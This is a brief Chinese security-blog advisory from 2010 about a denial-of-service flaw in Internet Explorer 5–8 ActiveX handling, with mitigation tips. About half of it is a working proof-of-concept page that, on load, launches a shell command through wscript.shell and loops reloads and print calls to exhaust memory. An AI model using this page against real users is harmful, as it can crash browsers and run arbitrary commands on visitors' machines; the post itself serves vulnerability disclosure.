Internet Explorer 无限循环拒绝服务漏洞
发布:admin | 发布时间: 2010年3月19日该漏洞存在于ActiveX控件中.
攻击者可以构造恶意页面诱使用户访问,恶意代码可运行任何Windows命令,消耗大量内存,导致访问者IE浏览器崩溃。
测试代码
<html>
<title>cnhackerx@163.com</title>
<head>
<script type="text/javascript">
function sucks()
{
var shell=new ActiveXObject("wscript.shell");
shell.Run("calc", 1);
}
function asheesh()
{
sucks();
window.onerror=new Function("history.go(0)");
window.print();
asheesh();
}
asheesh();
</script>
</head>
<body onLoad="asheesh()"></body>
</html>
影响版本
Internet Explorer 5,6,7,8
安全建议
禁止ActiveX控件自动运行。
不要手工运行该类控件运行。
文章如转载,请注明转载自:http://www.5iadmin.com/post/439.html
- 相关文章:
后一篇:« 服务器内存升级有讲究
前一篇:灵活使用“替换”通配符 »
发布:admin | 分类:最新漏洞 | 评论:0 | 引用:0 | 浏览:
| TrackBack引用地址
发表评论
◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。
